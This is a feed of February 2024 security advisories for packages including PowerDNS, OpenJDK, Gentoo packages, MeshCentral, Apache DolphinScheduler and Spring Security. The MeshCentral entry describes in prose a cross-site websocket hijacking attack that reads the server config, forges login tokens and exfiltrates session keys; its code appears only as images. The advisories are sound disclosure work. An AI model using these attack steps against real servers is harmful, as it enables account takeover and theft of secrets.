16.02.2024 02:00:00	freebsd	[FREEBSD:E15BA624-CCA8-11EE-84CA-B42E991FC52E] powerdns-recursor -- Multiple Vulnerabilities	cve@mitre.org reports: CVE-2023-50868: The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations. CVE-2023-50387: Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:E15BA624-CCA8-11EE-84CA-B42E991FC52E
17.02.2024 04:15:48	alpinelinux	[ALPINE:CVE-2024-20945] openjdk11, openjdk21, openjdk17 vulnerability	[From CVE-2024-20945] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N).	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20945
17.02.2024 04:15:46	alpinelinux	[ALPINE:CVE-2024-20919] openjdk11, openjdk17, openjdk21 vulnerability	[From CVE-2024-20919] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20919
17.02.2024 04:15:46	alpinelinux	[ALPINE:CVE-2024-20921] openjdk17, openjdk21, openjdk11 vulnerability	[From CVE-2024-20921] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20921
18.02.2024 02:00:00	debian	[DSA-5626-1] pdns-recursor	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5626-1
18.02.2024 02:00:00	gentoo	[GLSA-202402-17] CUPS: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in CUPS, the worst of which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-17
18.02.2024 02:00:00	gentoo	[GLSA-202402-12] GNU Tar: Out of Bounds Read (high)	A vulnerability has been discovered in GNU Tar which may lead to an out of bounds read.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-12
18.02.2024 02:00:00	gentoo	[GLSA-202402-13] TACACS+: Remote Code Execution (high)	A vulnerability has been discovered in TACACS+ which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-13
18.02.2024 02:00:00	gentoo	[GLSA-202402-14] QtWebEngine: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-14
18.02.2024 02:00:00	gentoo	[GLSA-202402-15] e2fsprogs: Arbitrary Code Execution (high)	A vulnerability has been discovered in e2fsprogs which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-15
18.02.2024 02:00:00	gentoo	[GLSA-202402-16] Apache Log4j: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in Apache Log4j, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-16
18.02.2024 02:00:00	gentoo	[GLSA-202402-18] Exim: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Exim, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-18
18.02.2024 02:00:00	gentoo	[GLSA-202402-19] libcaca: Arbitary Code Execution (normal)	A vulnerability has been discovered in libcaca which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-19
18.02.2024 02:00:00	gentoo	[GLSA-202402-20] Thunar: Arbitrary Code Execution (normal)	A vulnerability has been discovered in Thunar which may lead to arbitrary code execution	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-20
18.02.2024 02:00:00	gentoo	[GLSA-202402-21] QtNetwork: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in QtNetwork, the worst of which could lead to execution of arbitrary code.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-21
18.02.2024 06:06:15	rustsec	[RUSTSEC-2024-0014] `generational-arena` is unmaintained	The `generational-arena` crate's repository has been archived and is no longer maintained.## Alternatives - [slotmap](https://crates.io/crates/slotmap)	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0014
19.02.2024 02:00:00	gentoo	[GLSA-202402-28] Samba: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Samba, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-28
19.02.2024 02:00:00	redhat	[RHSA-2024:0857] python-pillow security update (important)	The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.Security Fix(es):* pillow: Arbitrary Code Execution via the environment parameter (CVE-2023-50447)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0857
19.02.2024 02:00:00	redhat	[RHSA-2024:0861] gimp:2.8 security update (important)	The GIMP (GNU Image Manipulation Program) is an image composition and editing program. GIMP provides a large image manipulation toolbox, including channel operations and layers, effects, sub-pixel imaging and anti-aliasing, and conversions, all with multi-level undo.Security Fix(es):* gimp: PSD buffer overflow RCE (CVE-2023-44442)* gimp: psp off-by-one RCE (CVE-2023-44444)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0861
19.02.2024 02:00:00	redhat	[RHSA-2024:0866] java-1.8.0-ibm security update (moderate)	IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.This update upgrades IBM Java SE 8 to version 8 SR8-FP15.Security Fix(es):* IBM JDK: Eclipse OpenJ9 JVM denial of service (CVE-2023-5676)* OpenJDK: IOR deserialization issue in CORBA (8303384) (CVE-2023-22067)* OpenJDK: certificate path validation issue during client authentication (8309966) (CVE-2023-22081)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0866
19.02.2024 19:16:28	rustsec	[RUSTSEC-2024-0016] dav1d AV1 decoder integer overflow	An integer overflow in dav1d AV1 decoder that can occur when decoding videos with large frame size. This can lead to memory corruption within the AV1 decoder. We recommend upgrading to version 0.7.0 of libdav1d-sys, which includes dav1d 1.4.0	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0016
19.02.2024 02:00:00	gentoo	[GLSA-202402-22] intel-microcode: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in intel-microcode, the worst of which can lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-22
19.02.2024 02:00:00	gentoo	[GLSA-202402-23] Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-23
19.02.2024 02:00:00	gentoo	[GLSA-202402-24] Seamonkey: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in Seamonkey, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-24
19.02.2024 02:00:00	gentoo	[GLSA-202402-25] Mozilla Thunderbird: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-25
19.02.2024 02:00:00	gentoo	[GLSA-202402-26] Mozilla Firefox: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-26
19.02.2024 02:00:00	gentoo	[GLSA-202402-27] Glade: Denial of Service (normal)	A vulnerability has been discovered in Glade which can lead to a denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-27
19.02.2024 02:00:00	redhat	[RHSA-2024:0811] sudo security update (moderate)	The sudo packages contain the sudo utility which allows systemadministrators to provide certain users with the permission to executeprivileged commands, which are used for system management purposes, withouthaving to log in as root.Bug Fix(es) and Enhancement(s):* CVE-2023-28487 sudo: Sudo does not escape control characters in sudoreplay output* CVE-2023-28486 sudo: Sudo does not escape control characters in log messages* CVE-2023-42465 sudo: Targeted Corruption of Register and Stack Variables	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0811
21.02.2024 04:54:57	npm	[NPM:GHSA-C9VV-FHGV-CJC3] agent-js: Insecure Key Generation in `Ed25519KeyIdentity.generate` (critical)	## ImpactThe library offers a function to generate an ed25519 key pair via `Ed25519KeyIdentity.generate` with an optional param to provide a 32 byte seed value, which will then be used as the secret key. When no seed value is provided, it is expected that the library generates the secret key using secure randomness. However, a recent change broke this guarantee and uses an insecure seed for key pair generation.Since the private key of this identity (`535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe`) is compromised, one could lose funds associated with the principal on ledgers or lose access to a canister where this principal is the controller. Users are asked to take proactive measures mentioned below in Workarounds:Users to protect their assets. ## PatchesPatch for the vulnerability is available in v1.0.1 for all the packages listed in the advisory. Please upgrade and deploy your canisters immediately. ## Workarounds### DevelopersThe recommended fix is to upgrade the package to the patched version. If that is not possible, there are couple of workarounds to handle the insecure key generation.1. Invoking the function as `Ed25519KeyIdentity.generate(null)` would fix the broken conditional evaluation and force the function to generate a securely random seed. However, this is not guaranteed to work for future upgrades.2. Passing a securely generated randomness as a seed to `Ed25519KeyIdentity.generate` would force the library to use it as the seed to generate the key pair.### Users#### Removing a controller of a canister if it's the affected principalFor all canisters you control, fetch the controllers of the canisters using ```shdfx canister info --ic <CANISTER>```If you see the principal `535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe` as one of the controllers, follow the steps below ```shdfx identity whoami # record CURRENT_IDENTITYdfx identity new <NEW_IDENTITY_NAME> dfx identity use <NEW_IDENTITY_NAME> dfx identity get-principal <NEW_IDENTITY_NAME> # record NEW_IDENTITY_PRINCIPALdfx identity use <CURRENT_IDENTITY>dfx canister update-settings --ic <CANISTER> --add-controller <NEW_IDENTITY_PRINCIPAL>dfx canister update-settings --ic <CANISTER> --remove-controller `535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe````For more details on canister management, please visit [here](https://internetcomputer.org/docs/current/tutorials/developer-journey/level-1/1.6-managing-canisters)#### Checking funds on wallets / ledgersIf you have funds on ledgers using a browser wallet, please check if the account principal matches `535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe`. If it does, please create a new account and transfer the funds to the new account immediately.## References1. [fix PR link](https://github.com/dfinity/agent-js/pull/851)2. [NPM patched version](https://www.npmjs.com/package/@dfinity/identity/v/1.0.1)3. [agent-js Github repo](https://github.com/dfinity/agent-js)4. [agent-js docs](https://agent-js.icp.xyz/identity/index.html)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C9VV-FHGV-CJC3
21.02.2024 02:34:15	maven	[MAVEN:GHSA-7RW2-3HHP-RC46] Cross-site Scripting Vulnerability in Statement Browser (moderate)	### ImpactA maliciously crafted xAPI statement could be used to perform script or other tag injection in the LRS Statement Browser.### PatchesThe problem is patched in version 1.2.17 of the LRS library and [version 0.7.5 of SQL LRS](https://github.com/yetanalytics/lrsql/releases/tag/v0.7.5).### WorkaroundsNo workarounds exist, we recommend upgrading to version 1.2.17 of the library or version 0.7.5 of SQL LRS immediately.### References* [LRS Tag](https://github.com/yetanalytics/lrs/releases/tag/v1.2.17)* [LRS lib on Clojars](https://clojars.org/com.yetanalytics/lrs/versions/1.2.17)* [SQL LRS 0.7.5 Release](https://github.com/yetanalytics/lrsql/releases/tag/v0.7.5)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7RW2-3HHP-RC46
21.02.2024 02:10:39	npm	[NPM:GHSA-CP68-QRHR-G9H8] MeshCentral cross-site websocket hijacking (CSWSH) vulnerability (high)	We have identified a cross-site websocket hijacking (CSWSH) vulnerability within the control.ashx endpoint of MeshCentral. This component is the primary mechanism used within MeshCentral to perform administrative actions on the server. To demonstrate the impact of the vulnerability we developed a proof-of-concept which leveraged the cross-site websocket hijacking vulnerability to read the server configuration file to leak the sessionKey variable, generating login tokens, and generating an authentication cookie.The vulnerability is exploitable when an attacker is able to convince a victim end-user to click on a malicious link to a page hosting an attacker-controlled site. The attacker can then originate a cross-site websocket connection using client-side JavaScript code to connect to “control.ashx” as the victim user within MeshCentral. There are some caveats to exploiting this issue however as MeshCentral configures `SameSite=Lax` security setting on cookies which introduces some additional preconditions for exploitation which we cover in a subsequent section.### MeshCentral Version TestedWe performed testing against MeshCentral version 1.1.20 which appears to be the latest supported version of the application. This appears to have been the latest version of MeshCentral available at the time we performed testing of the application in January and February 2024 (see Figure 1 and Figure 2).![image](https://github.com/Ylianst/MeshCentral/assets/1319013/4a24fce2-5047-47a1-ac91-ae84c44ef3f1)Figure 1: We determined that MeshCentral version 1.1.20 was the latest version available at the time we performed testing of the application.![image](https://github.com/Ylianst/MeshCentral/assets/1319013/4e347e91-6296-4b1a-a1d0-bb3587a82ea3)Figure 2: We configured our test environment on an Ubuntu server running version 1.1.20 of the MeshCentral application server.### What about SameSite=Lax Cookie Settings?One may make the counterpoint that the `SameSite=Lax` security setting (see Figure 4) effectively prevents cross-site websocket hijacking (CSWSH) issues as an attacker origin of attacker.com would not be within the same-site as the victim meshcentral server at say meshcentral.example.com. This means an attacker that is able to convince a user to click on a malicious link wouldn’t be able to successfully perform this attacker to the Lax setting with differing origins.Unfortunately, this isn’t entirely correct as there is a core difference between same-site and same-origin policies within all modern browsers. In this case, while it’s valid to say that the attack wouldn’t work in the case of attacker.com targeting meshcentral.example.com when the SameSite setting is configured to Lax for session cookies, there are several other scenarios where an attacker could perform the attack successfully (see Figure 3).![image](https://github.com/Ylianst/MeshCentral/assets/1319013/b108232d-7f85-4815-9439-431db0eeed85)Figure 3: A table from PortSwigger’s article on Bypassing SameSite Cookie Restrictions (source).From our perspective, the most relevant scenario is when an attacker is able to compromise an adjacent subdomain either through a vector such as a system compromise, exploiting a subdomain takeover vulnerability, or through exploitation of a cross-site scripting vulnerability within an adjacent application running under the same domain. For example, if an attacker found a cross-site scripting issue on example.com or vulnerable.example.com they would then be able to leverage the cross-site scripting issues on those domains to target meshcentral.example.com. There are other factors which could also allow an attacker to bypass the SameSite=Lax setting to perform cross-site websocket hijacking. For a more comprehensive list please see Bypassing SameSite Cookie Restrictions from PortSwigger.![image](https://github.com/Ylianst/MeshCentral/assets/1319013/8310a307-273f-44e5-948a-f1a2b49cf960)Figure 4: We observed that upon logging into MeshCentral the “xid” and “xid.sig” tokens were configured with the SameSite=Lax security settings.### Developing an Initial Proof-of-Concept ExploitAt this point we had a testing deployment of MeshCentral configured at meshcentral.example.com and simulated an attacker-compromised adjacent subdomain at evil.example.com. In this scenario, we assume the attacker exploited a subdomain takeover vulnerability to host malicious content on evil.example.com. Next, we developed a simple proof-of-concept payload which originated a cross-site websocket connection from the evil.example.com origin to meshcentral.example.com (see Figure 5).![image](https://github.com/Ylianst/MeshCentral/assets/1319013/725820ef-5e93-48f5-aa47-9e21b299f255)Figure 5: An initial proof-of-concept exploit we developed which simply sent a ping-message over the websocket connection from evil.example.com targeting meshcentral.example.com. We then triggered the exploit payload as a user that was logged into the MeshCentral application as an administrator by browsing to evil.example.com with a valid session on meshcentral.example.com. Weobserved a cross-site websocket connection to meshcentral.example.com with an origin header set to evil.example.com as it originated from the attacker domain (see Figure 6). The response indicated the connection was successful and we received the expected pong response to our ping message sent to the server.![image](https://github.com/Ylianst/MeshCentral/assets/1319013/9bcec329-4206-4ce6-bbba-a02a47c306d8)Figure 6: We observed that when originating a websocket connection across origins the origin header was sent by the browser to the MeshCentral server indicating the origin which originated the cross-site websocket connection.### Demonstrating ImpactAfter confirming the vulnerability we then developed a more comprehensive exploit payload to demonstrate the impact of the vulnerability (see Figure 7). Our new payload sent the serverconfig, authcookie, and createLoginToken actions to the administrative component. The ability to issue a new login token then provided us with persistent access to the users account. The ability to read the serverconfig file allowed us to exfiltrate the session key used to sign sessions allowing the attacker to forge valid session tokens as arbitrary users on the system. Our payload then read the response from the server and exfiltrated the sensitive data exported from the system to an attacker-controlled system for storage purposes (see Figure 8).![image](https://github.com/Ylianst/MeshCentral/assets/1319013/d42f8372-24c9-4786-bfaa-ed1f91915749)Figure 7: A proof-of-concept exploit we developed for the cross-site websocket hijacking vulnerability resulting in complete compromise of the user’s account and persistent access to the MeshCentral application as the victim user.![image](https://github.com/Ylianst/MeshCentral/assets/1319013/3e3977e1-a8c8-4856-9d27-f0307855049c)Figure 8: We performed the attack using the exploit code shown in Figure AA to invoked the authcookie, serverconfig, and createLoginToken endpoints on the victim MeshCentral system leveraging the cross-site websocket hijacking vulnerability from evil.example.com.After performing the attack successfully we used the issued login token to authenticate to MeshCental and access the console as the NT AUTHORITY\SYSTEM user for a windows agent which connected to the victim MeshCentral instance. This provided compromise of all the nodes within the impacted MeshCentral instance (see Figure 9 and Figure 10).![image](https://github.com/Ylianst/MeshCentral/assets/1319013/95405b59-8073-483e-9527-e1d03b546f5a)Figure 9: An attacker could leverage the login token created by the attacker to authenticate to MeshCentral and then leverage this access to compromise nodes managed by the impacted MeshCentral instance.![image](https://github.com/Ylianst/MeshCentral/assets/1319013/605b909e-54eb-4ad0-b397-84fa3fb9455d)Figure 10: An attacker could leverage the cross-site websocket hijacking vulnerability to read the server configuration file of the MeshCentral system as an administrator to obtain the key used to encrypt sessions (sessionKey).### RemediationTo remediate this vulnerability we recommend inspecting the origin header when websocket connections are established to control.ashx and other websocket endpoints. Verify that the origin header sent to the server matches an allowlisted origin. This would prevent an attacker from originating a cross-site websocket connection from an untrusted site.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CP68-QRHR-G9H8
20.02.2024 23:14:06	slackware	[SSA:2024-051-02] libuv	New libuv packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libuv-1.48.0-i586-1_slack15.0.txz: Upgraded. This update fixes a server-side request forgery (SSRF) flaw. Thanks to alex2grad for the heads-up. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-24806 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libuv-1.48.0-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libuv-1.48.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libuv-1.48.0-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libuv-1.48.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:168acaabcc67333e202fc3d9ac527d44 libuv-1.48.0-i586-1_slack15.0.txzSlackware x86_64 15.0 package:d6bf2ac93ed9649937755919a5233275 libuv-1.48.0-x86_64-1_slack15.0.txzSlackware -current package:fbcd398c4621d98839d041ec8632fc7f l/libuv-1.48.0-i586-1.txzSlackware x86_64 -current package:08108e6e433d2af7c84a39415fffd64a l/libuv-1.48.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libuv-1.48.0-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-051-02
20.02.2024 20:47:43	slackware	[SSA:2024-051-01] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.8.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.8.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-06/ https://www.cve.org/CVERecord?id=CVE-2024-1546 https://www.cve.org/CVERecord?id=CVE-2024-1547 https://www.cve.org/CVERecord?id=CVE-2024-1548 https://www.cve.org/CVERecord?id=CVE-2024-1549 https://www.cve.org/CVERecord?id=CVE-2024-1550 https://www.cve.org/CVERecord?id=CVE-2024-1551 https://www.cve.org/CVERecord?id=CVE-2024-1552 https://www.cve.org/CVERecord?id=CVE-2024-1553 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.8.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.8.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.8.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.8.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:02f08793a474ae14ee79dfe55a46f978 mozilla-firefox-115.8.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:ab30a974f11126bde6c390a51e8506f8 mozilla-firefox-115.8.0esr-x86_64-1_slack15.0.txzSlackware -current package:67d3f23b17823a87b6130a3bcb746631 xap/mozilla-firefox-115.8.0esr-i686-1.txzSlackware x86_64 -current package:98e662cff14e1b4885ebf83339c32f9f xap/mozilla-firefox-115.8.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.8.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-051-01
21.02.2024 02:22:50	maven	[MAVEN:GHSA-36XR-4X2F-CFJ9] Deserialization of Untrusted Data in Apache Camel SQL (high)	Deserialization of Untrusted Data vulnerability in Apache Camel SQL Component. This issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0.Users are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-36XR-4X2F-CFJ9
21.02.2024 02:22:05	maven	[MAVEN:GHSA-M43P-55RF-8C2J] Deserialization of Untrusted Data in Apache Camel CassandraQL (high)	Deserialization of Untrusted Data vulnerability in Apache Camel CassandraQL Component AggregationRepository which is vulnerable to unsafe deserialization. Under specific conditions it is possible to deserialize malicious payload.This issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0.Users are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M43P-55RF-8C2J
21.02.2024 02:21:46	maven	[MAVEN:GHSA-FF2W-WM48-JHQJ] Arbitrary File Read Vulnerability in Apache Dolphinscheduler (high)	Arbitrary File Read Vulnerability in Apache Dolphinscheduler.This issue affects Apache DolphinScheduler: before 3.2.1. We recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FF2W-WM48-JHQJ
21.02.2024 02:21:29	maven	[MAVEN:GHSA-VJQC-G788-F378] Session Fixation Apache DolphinScheduler (moderate)	Session Fixation Apache DolphinScheduler before version 3.2.1, which session is still valid after the password change.Users are recommended to upgrade to version 3.2.1, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VJQC-G788-F378
21.02.2024 02:19:02	maven	[MAVEN:GHSA-37GX-JQX9-FWMG] Improper Certificate Validation in Apache DolphinScheduler (high)	Because the HttpUtils class did not verify certificates, an attacker that could perform a Man-in-the-Middle (MITM) attack on outgoing https connections could impersonate the server.This issue affects Apache DolphinScheduler: before 3.2.1.Users are recommended to upgrade to version 3.2.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-37GX-JQX9-FWMG
21.02.2024 02:18:00	maven	[MAVEN:GHSA-QWXX-XWW6-8Q8M] Remote Code Execution in Apache Dolphinscheduler (high)	This issue affects Apache DolphinScheduler 3.0.0 before 3.2.1. We recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QWXX-XWW6-8Q8M
21.02.2024 02:17:30	maven	[MAVEN:GHSA-W3W6-26F2-P474] Broken Access Control in Spring Security With Direct Use of isFullyAuthenticated (high)	In Spring Security, versions 6.1.x prior to 6.1.7 and versions 6.2.x prior to 6.2.2, an application is vulnerable to broken access control when it directly uses the AuthenticationTrustResolver.isFullyAuthenticated(Authentication) method.Specifically, an application is vulnerable if: * The application uses AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly and a null authentication parameter is passed to it resulting in an erroneous true return value.An application is not vulnerable if any of the following is true: * The application does not use AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly. * The application does not pass null to AuthenticationTrustResolver.isFullyAuthenticated * The application only uses isFullyAuthenticated via Method Security https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html or HTTP Request Security https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html	